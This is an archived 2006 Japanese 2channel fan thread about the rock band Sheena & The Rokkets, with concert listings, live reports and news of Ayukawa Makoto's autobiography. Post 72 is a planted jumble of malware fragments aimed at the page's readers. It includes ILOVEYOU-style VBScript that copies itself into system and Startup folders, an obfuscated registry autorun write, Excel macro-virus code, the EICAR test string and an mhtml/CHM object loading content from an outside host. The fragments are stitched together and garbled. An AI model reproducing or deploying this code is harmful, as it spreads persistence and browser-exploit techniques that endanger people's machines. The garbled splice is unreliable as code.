2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【SHEENA】【シーナ ザ ロケッツ 2】【ROKKETS】

1 :SHEENA:2006/03/20(月) 20:14:59
福岡を代表するロックバンド>シナロケのスレッドです。
まったりと語りましょう。

前スレッド : http://music4.2ch.net/test/read.cgi/legend/1067517513/

公式頁 : http://www.rokkets.com/

【菊】サンハウス【鮎川】 : http://music4.2ch.net/test/read.cgi/legend/1118860686/

2 :伝説の名無しさん:2006/03/20(月) 20:17:58
「&」を入れ忘れた…
すまん…
死のう…

3 :伝説の名無しさん:2006/03/20(月) 20:49:54
「シーナ & ロケッツ関連紙ジャケ6タイトルまとめ買い」
http://www.sonymusicshop.jp/detail.asp?goods=SET0000000147

復刻紙ジャケットを6タイトル同時予約/購入いただいた方にオリジナル携帯待ち受けを5種プレゼント!
http://www.hmv.co.jp/news/newsdetail.asp?newsnum=512040017


4 :前スレの1です。:2006/03/20(月) 23:51:10
前スレをたちあげた時、シーナ&ザ・ロケットと誤記してしまい、
散々、批判され凹んでおりました。
そんな折、次スレの立ち上げ依頼があり、あれこれ考えてる折、次スレを
発見!!
>>2
死のうなんて言わないで下さい。
ビートルズの様に完璧だったら、バンドもここまで続かないでしょう。
だからストーンズは続いたと思います。
美学としての不完全を追求し、シナロケと共に30周年目指して、
これからも末長く、ゆっくり転がって行きましょう\(^o^)/

5 :伝説の名無しさん:2006/03/23(木) 15:56:50
5ゲットー!

6 :伝説の名無しさん:2006/03/24(金) 18:31:43
22日ストーンズの東京ドームにシーナとマコちゃん来てて
握手してもらった!
超優しくて感激しました。

7 :伝説の名無しさん:2006/03/26(日) 17:14:17
赤い靴盛り上がりましたね

8 :伝説の名無しさん:2006/03/26(日) 19:30:56
FMでプライベーツかばーしててた

9 :伝説の名無しさん:2006/03/26(日) 22:57:42
俺も聞いたー!

10 :伝説の名無しさん:2006/03/29(水) 03:26:52
紙ジャケ買いましたか?真空パック毎日聴いてます。


11 :伝説の名無しさん:2006/03/30(木) 02:20:13
4/2・9日出演
http://www.rkb.ne.jp/ajiwai/

12 :伝説の名無しさん:2006/03/31(金) 15:15:12
誰か加筆してくれ

ttp://ja.wikipedia.org/wiki/%E9%AE%8E%E5%B7%9D%E8%AA%A0

13 :伝説の名無しさん:2006/04/04(火) 11:10:14
道産子の皆さん、今月、札幌に来るね!!

盛り上がりましょう〜♪

14 :伝説の名無しさん:2006/04/09(日) 09:57:17
4/9 RKB 10:15 - 鮎川誠ロックへの旅



15 :伝説の名無しさん:2006/04/10(月) 20:52:16
>>13
情報サンクス。しかし4月24日の

会場:札幌サウンドアート専門学校
for the members only ← ここが気になる・・・。

16 :伝説の名無しさん:2006/04/12(水) 12:29:23
うわー!
>12
すごい情報量すね。
シナロケも書いてください。

17 :伝説の名無しさん:2006/04/13(木) 22:17:51
今年の高塔山ジャムはどげなメンバーやろね

18 :伝説の名無しさん:2006/04/14(金) 03:12:56
13です。
>>15
遅レスすまん。
何それ!?専門学校か何かでやるの?知らんかった…
こちらこそ、情報ありがと!
その最後の行、気になるね…何のMemberなんだ。
調べてみよ。

19 :伝説の名無しさん:2006/04/19(水) 16:43:15
どうも専門学校の生徒じゃないと見れないらしい。

20 :伝説の名無しさん:2006/04/27(木) 02:44:45
保守

21 :伝説の名無しさん:2006/04/27(木) 03:25:34
札幌@エル・マンゴー、楽しかった!!
すげーもん見たちゃった。
セッション、カッコ良かったよ。
ライブ後もお疲れのところ、シーナさんと鮎川さん、気さくに写真撮ってくれたり優しいし。
シーナさん、白のフリンジの衣装で素敵でした!

22 :伝説の名無しさん:2006/05/07(日) 13:03:07
過疎ってるね。

札幌サウンドアート専門学校のライブ、検索したら、写真とか出てくるよ。
鮎川さん、講師もしたみたい。
そんな授業、受けてみたいー!!

23 :伝説の名無しさん:2006/05/13(土) 11:02:54
ttp://www.hurricane-inc.jp/hurricanefestival06.html

Hurricane Festival 2006
7/27 (thu) 渋谷CLUB QUATTRO
open 18:00 start 19:00 前売り \3,500 (with 1drink)
出演:
SHEENA & THE ROKKETS
カーネーション
Opening Act : eksperimentoj

24 :伝説の名無しさん:2006/05/14(日) 16:40:10
ついさっき原宿で2人とすれ違いますた。外人さんと一緒に歩いてますた

25 :めぐにゃん:2006/05/19(金) 16:42:08
6月10日新宿ロフト楽しみ!!久々にワンマンっ!

<SHINJUKU LOFT 30TH ANNIVERSARY“ROCK OF AGES 2006”>
【公演日】6月10日(土)
【場所】新宿LOFT
【出演】SHEENA & THE ROKKETS
【時間】18:30 OPEN 19:30 START
【料金】ADV4,000yen(+drink) DOOR4,500円(+drink)
【発売日】4/16(日)ぴあ( 0570-02-9999)/ローソン(0570-084-003)LOFT(03-5272-0382)にて発売
●Pコ−ド:227-187 / Lコ−ド:31510
【問い合わせ】新宿LOFT(03-5272-0382)

26 :めぐにゃん:2006/05/19(金) 17:08:35
外人さん?インターナショナルですねぇ。
シーナもマコちゃんも英語ペラペラなのかな?

27 :伝説の名無しさん:2006/05/21(日) 02:20:32
人ごみの中でも絶対わかるミュージシャンNO1

28 :伝説の名無しさん:2006/05/22(月) 11:47:38
>>25
レポきぼん
行けないんだよね(´・ω・`)

29 :めぐにゃん:2006/05/22(月) 18:52:01
>28
了解でつ!

ロックの好きなベイビー抱いて やってほしいなぁ。
シナロケ関係者さん見てたらお願いでつ(≧。≦)

30 :伝説の名無しさん:2006/05/23(火) 04:08:02
今日は大阪でギターウルフと・・

31 :伝説の名無しさん:2006/05/23(火) 12:44:57
そういや、ギターウルフとやるやつ今日だった
シナロケ、ギターウルフ、50回転ズ、元サイドワンの兄弟がやってるハリス
かなり豪華だな。行きたかった

32 :伝説の名無しさん:2006/05/23(火) 13:32:45
うわ〜楽しそうだな。当日券あったら行こう。

>>22
鮎川さんが講師したの?
マジで受けたい!その授業。
ロックの歴史もハンパなく詳しいしな。

33 :めぐにゃん:2006/05/24(水) 02:14:16
今日のライブ行った人ー!感想ヨロ。

34 :伝説の名無しさん:2006/05/26(金) 23:25:34
大阪ライブ最高ですたー!ぐっちゃぐちゃになってみますた。
ロケッツやってる時セイジもノッて観てますた

ギターウルフも50回転ズもよかったけど、なんつーか、ロケッツのライブって特別つーか、気付いたら子供みたいに純粋な気持ちになって観てて。
帰り道泣きそうになったorz

35 :伝説の名無しさん:2006/05/28(日) 06:30:22
age

36 :めぐにゃん:2006/05/29(月) 04:36:00
>>34
うんうん、なんか伝わってきた。

ロフトが楽しみっ!

37 :伝説の名無しさん:2006/06/07(水) 09:12:49
<高塔山ジャム2006>

7月23日(日) 10:00?19:30 ※小雨決行

北九州市若松区高塔山野外音楽堂

入場無料 (1ドリンク制)

SHEENA & THE ROKKETS
ROCK'N'ROLL GYPSIES
KOJI MINAMI AND CNSTRCTRS
The dobbrock
KEI啓人&52
DUB ROCKERS
GILLCOVER
Herish
PEACE MAKER
Buffalo Denchi
DJ KOJI

...and more

http://www.hakata-rock.net/t-jam2006/index.htm

38 :伝説の名無しさん:2006/06/07(水) 14:22:30
高塔山は1人でもいけそうな雰囲気ですか?(当方女)
一緒に行く人がいないのでかなり地元民なのですが
(遠足はいつもココ)毎年いけずじまいです…かなしかば〜い
10年ぐらい前にLIVEのゲストで見て以来です。行きたいよー!
いくつになられても素敵なご夫婦ですよね〜

39 :めぐにゃん:2006/06/07(水) 20:05:51
>>38

オフィシャルで写真見たんですが、ロックフェス(例えばウッドストックの様な?)
みたいなごちゃごちゃした雰囲気で1人でも全然大丈夫そうですよ。
整然としたライブだったら1人で行きにくいですけど。

ってか、高遠山って山ですよね!?小さい山なんですか?みんなで登山??
なんにしろスゴイ。そんな気持ちよさそうな場所でシナロケライブ観れるなんて。
シナロケって野外が似合うから私も行きたいです、、
でも東京に住んでるから行けそうにないので。
地元民なら1人ででも行かなきゃソンですよーーー!

東京でも今週末のロフトライブが迫ってマス・・・!!!
毎日聴きまくってテンション上げ上げでつ(≧▽≦)/

40 :伝説の名無しさん:2006/06/07(水) 22:59:32
会場に人が溢れているという感じではないのでバンド交代の合間なんかは一人だと辛いかも…
ただシナロケとジプシーズは日が沈みかけた頃に登場だと思うので、その頃にやってくれば女性一人でも気にならないかと

41 :伝説の名無しさん:2006/06/08(木) 05:07:07
>>37
量がすごい

42 :伝説の名無しさん:2006/06/09(金) 14:56:17
鮎川さんのロック自伝すっげーおもしろい!!
イントロからテンポいい

ttp://www.amazon.co.jp/gp/product/4861710162/249-4869830-6140342?v=glance&n=465392

43 :38:2006/06/09(金) 18:01:56
みなさんレスありがとうございます。去年はたしか前日か後日に地元の
お祭りみたいな感じで駅前でミニライヴもあったけど、これも仕事で行けませんでした。
高塔山はふもとからからだと45分ぐらいで登れる山です。(車は3分)景色はイイですよ!
ステージは「森の音楽堂」と言われてちっさいです。今年はがんばって夕方こっそり行ってきます。

昔母が勤めていたお店(飲食店)によく食べにいらして、一番下の子がパパの
ひざの上に乗って「私パパと結婚する〜!」とずっと言ってたそうです。
シーナさんは近距離でお見かけすることがたびたびありましたが、
小さくて細くて超COOL!普段からあの服装なので感動しました。
カッコよく歳はとりたいですーorz…猛烈に反省中




44 :めぐにゃん:2006/06/10(土) 01:30:25
2ヶ月前から楽しみにしていたロフトのライブがとうとう今夜!で
『たいくつな世界』聴きながら興奮気味です・・ウズウズ。

>>43
高塔山(高遠山じゃなかったですね^^;)行ってらっしゃい!
そのロケーション、マジ羨ましいです。
ついでにレポお願いしまーす(^ー^)ゝ
高塔山って小さい山なんですね。
東京で言うと高尾山くらいの感覚なんでしょうかね。

>普段からあの服装
そうそう、すごいですよね!本物って感じします。
私はフジロックで初めてシナロケ知って電撃くらい、その直後2人を下北で見かけて
ライブの印象そのまんまでチョー興奮しました。
めっさ可愛いデッカイわんちゃん2頭連れてました。

・・あ〜、なんだか今夜は眠れそうになぃ( ̄◇ ̄)

45 :伝説の名無しさん:2006/06/10(土) 03:16:45
二人でウォーキングしてた

46 :伝説の名無しさん:2006/06/10(土) 20:34:30
げっといっとおんべいびーがゲリロンベイベーに聞こえる件について。

47 :めぐにゃん:2006/06/11(日) 04:04:27
ただいまでーす、ロフト行ってきました!や〜最高でちた!盛り上がった!
ロックの好きなベイビーはやらなかったけれど、
JUNGLE OF LOVEやラフネックブルースやI LOVE YOU、私の知らない古いアルバムの曲もたくさん聴けました!
どぶねずみ(多分)の時にシーナがドラムの隣に立って踊ってたのが妖艶でマジ見とれました。。この瞬間、私も髪を伸ばすことを決意しました。
それから後半のレモンティー、たいくつな世界、オマエガホシイ・・やばかった!
終わった後サイン会みたいになって、長蛇の列に並び
鮎川さん書下ろしの60’Sロック自伝買ってサインと握手してもらいました。
でも緊張してほとんど喋れず、、鮎川さん超優しかったですw

ラフネックブルースの前にやった曲がすごくかっこよかったのですが、
曲名誰か知ってたら教えてください。

>>28
まだ興奮しててレポになってなくてすみません。

48 :伝説の名無しさん:2006/06/11(日) 11:43:23
いいなー!
妊婦だけどライブ行きたい。
ROCK'N BABYになるだろうな。

49 :伝説の名無しさん:2006/06/12(月) 02:31:23
ロックの好きなベイビー抱いて〜

可愛いママが行〜く〜♪

50 :伝説の名無しさん:2006/06/12(月) 02:54:24
その頃の曲って阿久悠が作詞してるんだよな

51 :伝説の名無しさん:2006/06/12(月) 18:53:56
突然雨が降ると 人間の正体がわかる〜

52 :伝説の名無しさん:2006/06/13(火) 10:56:59
阿久悠の作詞の曲はゴミばかり

53 :伝説の名無しさん:2006/06/13(火) 19:39:43
かっこいいyo

54 :伝説の名無しさん:2006/06/15(木) 13:51:21
>>28
ラフネックブルースの前にやった曲は「ブルースの気分」
1stからは結構やりましたな

55 :伝説の名無しさん:2006/06/17(土) 03:39:04
6月10日はロケットの日
http://smashingmag.com/tour/06tr/060610rokkets_nao1.html
http://smashingmag.com/tour/06tr/060610rokkets_nao2.html

56 :めぐにゃん:2006/06/18(日) 06:24:25
>>54
レスどうも!ブルースの気分っていうんですね。#1の曲なのかー。
オフィシャルでさっそくチェックしました。
あの2番の借金取りの所の歌詞が好きです!
ライブの時、最後の所は 僕→みんな って言ってましたよね♪
やっぱり#1は買わなきゃ〜。

>>55
このホムペ全然知りませんでした!写真かっくいぃ!セットリストも載ってて感激しました。
あの日の記憶が蘇ぇ・・
シーナさんの衣装がピンクに見えたり白に見えたり、キラ2して人魚みたいだったぁ〜。

57 :夏の魔物:2006/06/21(水) 06:54:15
青森で手作りのロックフェスを行います。
AOMORI ROCK FESTIVAL.06'〜夏の魔物〜
2006年07月29日 つがる市 森田町 野外円形劇場
一人券 5000円
ペア券 9000円
四人券 16000円

Sheena & The Rokkets
The ピーズ
ジッタリン・ジン
POLYSICS
Scoobie Do
フラワーカンパニーズ
うつみようこ&YOKOLOCO BAND
曽我部恵一
ニューロティカ
M.J.Q(遠藤ミチロウjointクハラカズユキ)
ギターウルフ
あふりらんぽ
DMBQ
うきぐも
THE WAYBARK
and more…
(全18組予定。後日発表)

ホームページ
http://natsunomamono.fc2web.com/
携帯
http://ip.tosp.co.jp/i.asp?I=natsu_no_mamono

よろしくお願いします。

58 :伝説の名無しさん:2006/06/22(木) 03:28:50
すごいメンツ!ジッタリンジンも見たい!
青森かー・・行きたいけど遠い・・
チケットの制度が面白いな。
この企画、そのまま東京でもやってくれないかな

59 :伝説の名無しさん:2006/06/22(木) 16:52:05
ロックの時代を信じるシナロケに乾杯だ!

60 :伝説の名無しさん:2006/06/22(木) 19:39:59
オー!

61 :伝説の名無しさん:2006/06/22(木) 20:12:37
あのオバちゃん
年いくつ?

62 :めぐにゃん:2006/06/22(木) 21:20:38
青森ライブの話、ロフトでもしてましたね。
鮎川さんのMCってなんか和む(^-^*)
青森はさすがに遠いし、スルーしようと思ってたけど、やっぱり楽しそう。
タイトルに異様に惹かれます・・。会社休めたら行こうかな〜なんて。

そういえば、鮎川さんが言ってた『ドクロマガジン』の詳細
知ってる方いませんか?

63 :伝説の名無しさん:2006/06/29(木) 22:52:50
鮎川誠×シーナ×直枝政広ハリケーン鼎談
ttp://www.carnation-web.com/2006/hurricane_talk.html

64 :伝説の名無しさん:2006/07/04(火) 17:43:32
【音楽】鮎川誠「今の人畜無害みたいのばっかりでロックやられてたまるか」[07/04]

鮎川誠が現ロックに喝!!

 ローリング・ストーンズの創始者でリーダーでもあったブライアン・ジョーンズの死
(享年27)の謎に迫る映画「ブライアン・ジョーンズ ストーンズから消えた男」
(8月5日公開)の試写会が3日、都内で行われ、自著「,60sロック自伝」を出版した
「シーナ&ザ・ロケッツ」の鮎川誠(58)がトークショーを行った。

「反社会的な悪いイメージのストーンズにひかれた。なかでもものすごくブライアンが光ってた。
今の人畜無害みたいのばっかりでロックやられてたまるか、っちゅう気持ちでおります」
と熱く語った。

ソース:デイリースポーツonline 2006/07/04
http://www.daily.co.jp/gossip/2006/07/04/0000064744.shtml

ブライアン・ジョーンズ ストーンズから消えた男
http://brianjones.jp/
SHEENA & THE ROKKETS' OFFICIAL WEB SITE aka RokketWEB
http://www.rokkets.com/
'60sロック自伝
http://www.cdjournal.com/Company/products/mook.php?mno=20060602a

http://news18.2ch.net/test/read.cgi/mnewsplus/1151985240/


65 :伝説の名無しさん:2006/07/07(金) 05:39:11

コピーのトナーカートリッジのルート営業の仕事は
ロックンロールエヴァンジェリストとも
音楽著述業とも
いいません




66 :伝説の名無しさん:2006/07/09(日) 07:41:15
いまだレモンティーなんかやってるの?ヤードバーズのパクリ問題はどうなってんの?
ジャンピン・ジャック・フラッシュのモロパクリ曲もあったし。

曲作りの才能がもうちょっとあったらねぇ。

67 :伝説の名無しさん:2006/07/09(日) 08:47:27
どうもなってません。そんなカビが生えた話題は御勘弁ください

68 :伝説の名無しさん:2006/07/09(日) 20:52:08
伝統芸能みたいなものなんで

69 :伝説の名無しさん:2006/07/11(火) 16:53:51
≪サイン会開催決定!≫
鮎川誠サイン会を、ディスクユニオン下北沢店で開催いたします!
http://www.cdjournal.com/Company/products/ayukawa/

開催日時 8/5(土) 16:00〜18:00

ディスクユニオン下北沢店へのアクセスはこちら→http://shop.diskunion.net/dsk/

70 :伝説の名無しさん:2006/07/11(火) 19:13:06
<シナロケのアルファ時代の“ワースト&レア”音源集が発売!>

日本を代表するロック・ギタリスト、鮎川誠氏が語りおろした初の自伝本、『'60sロック自伝』(写真・音楽出版社刊)に触れた興奮がいまだにさめない皆様に朗報!
 
シーナ&ザ・ロケッツが70年代末〜80年代初頭にかけて音源をリリースしていた“アルファ・レコード”在籍時代の初期音源からベスト盤に収録される事が少ない楽曲や、
レア音源を集めたファン必携のアルバム『Rokket Factory 〜the worst and rarities of Sheena & The Rokkets in Alfa years〜』(MHCL-859 \3,000(税込))が8月23日に発売されます。

収録予定の曲目は\ENレーベルからミッキー・カーティスのプロデュースで発売された『ピンナップ・ベイビー・ブルース』やデジタル・ビートを導入し、ニューウェイヴなアレンジが異色の問題作『チャンネル・グー』、
ロックのすべてがここにある永遠の名盤『真空パック』などから選曲される模様。
タイトルに“ワースト”の文字がおどるなど、鮎川氏ならではのアイロニカルなセンスがまたしびれる逸品。
初回仕様限定盤にはTシャツの応募券が封入されているとのこと。

http://www.cdjournal.com/main/news/news.php?nno=12170

71 :伝説の名無しさん:2006/07/20(木) 17:47:44
鮎川のギター聴いてるだけで 幸福感あるなあ 泉谷とやった火の鳥は まさに 豪快!めんたんぴんのギタリストも 富士夫以上の鋼鉄のギターと絶賛するのも わかる

72 :伝説の名無しさん:2006/07/20(木) 20:25:44
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


73 :伝説の名無しさん:2006/07/21(金) 22:33:13
高塔山ジャムは土砂降りになりそうな…


74 :伝説の名無しさん:2006/07/21(金) 22:47:44
鮎川さん、京都でもやってください

75 :伝説の名無しさん:2006/07/23(日) 23:25:08
立ちっぱなしだったのでつかれたよ

76 :伝説の名無しさん:2006/07/26(水) 12:50:15
レモンティーがヤードバーズのパクリだって、しってた?

77 :伝説の名無しさん:2006/07/26(水) 14:13:43
元曲よりかっこいいw


78 :伝説の名無しさん:2006/07/26(水) 15:49:56
いまだにレモンティごときで騒いでるやつは
きっとヤードバーズしか知らないのだなあ

ほら、どんどん元ネタ挙げてみ!
それがロックな愛だ

79 :伝説の名無しさん:2006/07/26(水) 16:13:43
べ、別にパクリまくりだとは、、、。

80 :伝説の名無しさん:2006/07/26(水) 20:59:22
レディオジャンクやったのね

81 :めぐにゃん:2006/07/27(木) 04:43:46
さあさ、東京地区のみなさん!
今日はとうとうハリケーンフェスティバルです(≧▽≦)/~
高遠山でも参加されたキーボードの方がクアトロでも出るそうですね。
どんなサウンドなんでしょうかね〜?すごく楽しみ!!

2006年7月27日(木)@渋谷クラブクアトロ
Open/Start 18:00/19:00
前売 @3,500円
出演:Sheena & The Rokkets/カーネーション
Opening Act:eksperimento

ところで近頃ブルーアップオンザビーチや夏の終わりのロック、ピンナップベイビーブルースにはまってマス。
アルファ復刻のおかげでアルバム結構揃いました♪
夏の選曲集や、PUNK選曲集、ドライブ選曲集、まったり、ときめき・・等々
自分で作って楽しんでます。。ww( ̄▽ ̄*)

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)